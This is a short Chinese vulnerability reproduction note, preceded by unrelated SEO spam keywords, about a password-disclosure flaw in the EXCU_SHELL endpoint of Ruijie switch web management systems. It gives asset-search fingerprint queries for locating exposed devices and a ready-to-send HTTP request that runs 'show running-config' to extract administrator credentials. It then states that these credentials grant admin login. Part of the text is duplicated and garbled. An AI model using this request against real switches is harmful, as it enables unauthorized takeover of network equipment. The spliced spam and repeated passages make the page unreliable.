网站宣传册怎么做的,郑州建设企业网站公司,注册公司网站,天元建设集团有限公司招聘信息一、漏洞简介
锐捷交换机 WEB 管理系统 EXCU_SHELL存在密码信息泄露漏洞#xff0c;攻击者可从漏洞获取到管理员账号密码#xff0c;从而以管理员权限登录。
二、影响版本
锐捷交换机 WEB 管理系统
三、资产测绘
hunterweb.bodyimg/free_login_ge.gif攻击者可从漏洞获取到管理员账号密码从而以管理员权限登录。
二、影响版本
锐捷交换机 WEB 管理系统
三、资产测绘
hunterweb.bodyimg/free_login_ge.gifweb.body./img/login_bg.gif登录页面
四、漏洞复现
GET /EXCU_SHELL HTTP/1.1
Cmdnum: 1
Command1: show running-config
Confirm1: n
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q.2, */*; q.2
Connection: close使用获取的账号密码成功登录系统
